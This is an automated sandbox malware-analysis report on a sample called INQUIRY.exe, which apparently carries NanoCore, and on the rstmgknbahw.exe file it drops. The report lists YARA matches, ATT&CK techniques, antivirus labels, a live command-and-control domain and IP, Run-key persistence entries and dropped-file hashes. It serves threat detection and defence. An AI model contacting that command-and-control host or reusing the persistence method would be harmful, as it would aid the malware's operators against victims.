Source: Yara match	File source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Native API	1 Registry Run Keys / Startup Folder	112 Process Injection	1 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	15 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Remote Access Software	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	21 Software Packing	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	21 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	112 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INQUIRY.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.0.rstmgknbahw.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
1.2.INQUIRY.exe.30e0000.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.0.INQUIRY.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.0.INQUIRY.exe.400000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.rstmgknbahw.exe.400000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.0.INQUIRY.exe.400000.5.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.2.rstmgknbahw.exe.4980000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.rstmgknbahw.exe.400000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.rstmgknbahw.exe.49d0000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.0.rstmgknbahw.exe.400000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.0.INQUIRY.exe.400000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.0.INQUIRY.exe.400000.11.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.rstmgknbahw.exe.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.2.rstmgknbahw.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.1.rstmgknbahw.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.rstmgknbahw.exe.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.0.rstmgknbahw.exe.400000.11.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.0.rstmgknbahw.exe.400000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.0.rstmgknbahw.exe.400000.5.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.1.rstmgknbahw.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.2.INQUIRY.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.2.INQUIRY.exe.39a98c0.6.unpack	100%	Avira	TR/NanoCore.fadte	Download File
6.0.rstmgknbahw.exe.400000.5.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.rstmgknbahw.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.rstmgknbahw.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.2.INQUIRY.exe.2520000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.0.rstmgknbahw.exe.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.0.INQUIRY.exe.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
2.0.INQUIRY.exe.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.rstmgknbahw.exe.400000.11.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.0.rstmgknbahw.exe.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
onyeoma.ddns.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
onyeoma.ddns.net	0%	Virustotal		Browse
onyeoma.ddns.net	0%	Avira URL Cloud	safe
127.0.0.1	0%	Virustotal		Browse
127.0.0.1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
onyeoma.ddns.net	185.140.53.6	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
onyeoma.ddns.net	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
127.0.0.1	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	rstmgknbahw.exe, rstmgknbahw.exe, 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmp, rstmgknbahw.exe, 00000005.00000000.695461777.0000000000409000.00000008.00020000.sdmp, rstmgknbahw.exe, 00000006.00000000.707759536.0000000000409000.00000008.00020000.sdmp, INQUIRY.exe, rstmgknbahw.exe.1.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	INQUIRY.exe, rstmgknbahw.exe.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.140.53.6	onyeoma.ddns.net	Sweden		209623	DAVID_CRAIGGG	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	558450
Start date:	24.01.2022
Start time:	02:23:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INQUIRY.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/12@20/1
EGA Information:	Successful, ratio: 83.3%
HDC Information:	Successful, ratio: 71.6% (good quality ratio 66.4%) Quality average: 75.8% Quality standard deviation: 31.1%
HCA Information:	Successful, ratio: 85% Number of executed functions: 183 Number of non-executed functions: 84
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target INQUIRY.exe, PID 7084 because there are no executed function
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:24:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run earyw C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
02:24:18	API Interceptor	962x Sleep call for process: INQUIRY.exe modified
02:24:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run earyw C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
02:24:29	API Interceptor	2x Sleep call for process: rstmgknbahw.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.140.53.6	1FB6ncJ5XP.exe	Get hash	malicious	Browse
	d1IaoX0mpm.exe	Get hash	malicious	Browse
	ORDER LIST.xlsx	Get hash	malicious	Browse
	DeKjb2fKJT.exe	Get hash	malicious	Browse
	MT103 tek M#U00fc#U015fteri kredi aktarma kopyas#U0131,pdf.exe	Get hash	malicious	Browse
	DEKONT,pdf.exe	Get hash	malicious	Browse
	PO 001077 - CS#000310.xlsx	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	SMS Report.exe	Get hash	malicious	Browse	185.140.53.134
	Order confirmation.jar	Get hash	malicious	Browse	91.193.75.133
	IMG_4100047645799946532.exe	Get hash	malicious	Browse	185.140.53.147
	psrrNeG1IA.exe	Get hash	malicious	Browse	185.140.53.136
	New PO #2022.exe	Get hash	malicious	Browse	185.140.53.178
	Confirm Invoice Payment.pdf.exe	Get hash	malicious	Browse	185.140.53.136
	T4EkbDIoVAPcUMQ.exe	Get hash	malicious	Browse	185.140.53.15
	Invoice 20221901.exe	Get hash	malicious	Browse	185.140.53.178
	sFW10IJn17.exe	Get hash	malicious	Browse	185.140.53.146
	New Price List For DStv&GOtv.pdf.jar	Get hash	malicious	Browse	91.193.75.133
	PO#5689.xlsx	Get hash	malicious	Browse	185.140.53.146
	GWwW938Bot.exe	Get hash	malicious	Browse	91.193.75.135
	Specification_2022.doc__.rtf	Get hash	malicious	Browse	91.193.75.135
	Specification_2022.doc	Get hash	malicious	Browse	91.193.75.135
	G2M18C6INV0ICERECEIPT.vbs	Get hash	malicious	Browse	185.140.53.10
	PO#0065026.doc.exe	Get hash	malicious	Browse	185.140.53.132
	TT#U007e)9383763563783039847949N.cmd.exe	Get hash	malicious	Browse	185.140.53.130
	Viaggitremila order.jar	Get hash	malicious	Browse	91.193.75.133
	RFQ_6400056554899993763.exe	Get hash	malicious	Browse	185.140.53.147
	RFQ_6400056554899993763.exe	Get hash	malicious	Browse	185.140.53.147

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\rstmgknbahw.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
MD5:	61CCF53571C9ABA6511D696CB0D32E45
SHA1:	A13A42A20EC14942F52DB20FB16A0A520F8183CE
SHA-256:	3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
SHA-512:	90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Temp\m30xh3rgrf9sf7w0k

Download File

Process:	C:\Users\user\Desktop\INQUIRY.exe
File Type:	data
Category:	dropped
Size (bytes):	278527
Entropy (8bit):	7.986066778609259
Encrypted:	false
SSDEEP:	6144:TYEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1X:TYxZ3Q8Heldu4IaCTm/HX59
MD5:	16FC364F28AB0F84C023E255CE6B0793
SHA1:	BD610A8C17B0A5C0C0AF67542F7533271229F584
SHA-256:	167379B6A1CD5727CCA9F6891B4A58FF06C42490E61D7AE7F8AAFD26F05D1B38
SHA-512:	D042B54CA997370F3B86FF5567D956489FF7FF9EED92CF5822FE6CDCDB1FB88EC37011E2F6D498BFBD6811CF6C668C0DADD68FFE58642C6B82842B32E2AA75CC
Malicious:	false
Reputation:	low
Preview:	..8..'......".8.`.;Z.t.~.......R._..![...j9B..[f.E$<R&.(.=...P..{m..-.]..G.#..'...D.)...~`..."...{.0...5U.L.L....?A.p.5.3tw....6...\|VW.u$..\..7.....v..tTK..<?..cf..:..-..2..g.............j.].A....n.~..Ne-.#='..#......5fGeG..k...6.5~A.3.\|Y.C+...&..YF..'..^..R..8...Z.t.........k.._.![...j9B.U.f.E.<R&.(...V..t..{....(].\Wbf.J....w.........s.......$.Dxy.G.0.K.Cp.5V3tw.~z...[.a..@.\|.{..!.G[....$.s\|...dRg-Q....._.......w..u).....2.\.8sw.=..E.L..g...y.v....f.u.....j....$Wv.(lS.....C+...&.j.pN.'......!.8.J.;Z.t........R....y./g.i$B.2zf.E.<R&.(.."......{2...(..\|Wb..Z...w.....l.....s.Xc....$.9xy.G0.6K...UO..tw.~z..#..Y0%@h..{.#........$.!\|.=.[\|JQ..J..j..{.w......u)......\k8sw.=..6....g...y.v....fTu.....j....$Wv.(lS.....C+...&..YF..'.....M.8.`.;Z.t........R._..![...j9B..[f.E$<R&.(.........{2...(..\Wbf.Jo...w........s.....$.9xy.G*0.6K.Cp.5.3tw.~z...[.Y.%@h\|.{.#........$.s\|...dRg-Q....._..{r...w..u).....2.\.8sw.=..6....g...y.v....fTu.....

C:\Users\user\AppData\Local\Temp\nsc48D5.tmp

Download File

Process:	C:\Users\user\Desktop\INQUIRY.exe
File Type:	data
Category:	dropped
Size (bytes):	328199
Entropy (8bit):	7.763501353201283
Encrypted:	false
SSDEEP:	6144:KU0YEMx0q3EXCouk+eWWP1QbXva183aCT0B/ER78PemFd/1OF2:QYxZ3Q8Heldu4IaCTm/HX5q2
MD5:	6EB0F8E8E159CC6BE6F7C45CA7B714F2
SHA1:	85A286A84D5344F29261BAC2622C98F61DC3BC6A
SHA-256:	F85D1A62A230E16ACCF48069072C12F4EDD62350375FF21AF97257AC90CF8874
SHA-512:	D6D0EA566DC37B961F2A16BF6BC892B261B92183C3BDB709F2B895E2BBA6E3E8DE1AD4A7D99767ECEA5890A364FA759DFD7E3C274F4B2080BBF9C3624A668544
Malicious:	false
Reputation:	low
Preview:	.\......,...................F...lE.......[......m\..........................................................................................................................................................................................................................................J...............#...j...........................................................................................................................................$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll

Download File

Process:	C:\Users\user\Desktop\INQUIRY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18432
Entropy (8bit):	5.728423253996569
Encrypted:	false
SSDEEP:	384:fWrH9a+lIcHqWIHcJALBQNdZCvSdQkU7kO0Kkqb:0nlIfWILoLUSdQHkJKT
MD5:	964F57C518C022C62A555DEB4E48D02E
SHA1:	B71006B1850415DDF27B656A18382963EDBD4C9D
